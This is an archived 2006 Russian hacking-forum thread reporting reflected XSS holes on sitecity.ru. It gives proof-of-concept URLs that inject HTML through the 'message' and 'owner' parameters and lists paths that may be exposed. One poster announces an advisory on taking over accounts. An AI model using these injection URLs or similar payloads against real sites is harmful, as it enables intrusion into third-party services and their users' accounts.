PDA

Просмотр полной версии : XSS (passive) на sitecity.ru


_kREveDKo_
22.04.2006, 15:36
http://sitecity.ru/badlogin.phtml?message=<h1>antichat-forever

PinkPanther
22.04.2006, 17:24
Как раз сейчас дописываю адвисори по sitecity.ru. Наконец-то всеже выкроил время, уже пособирал все свои скрины, скрипты. Осталось теперь доокончить все и в кучу впихнуть.
Там от активной XSS до полного захвата аккаунта(и даже вплоть до его удаления иль дефейса) с помощью функционалки. Так что ждемс....))

_kREveDKo_
20.05.2006, 23:03
Вот ещё покопался...

http://sitecity.ru/adm_prmail.phtml?act=compose&owner="><h1>XSS
http://ns.sitecity.ru/fimages/_буква_англ_алфавита,_или_ци фра_/
http://sitecity.ru/http_errors/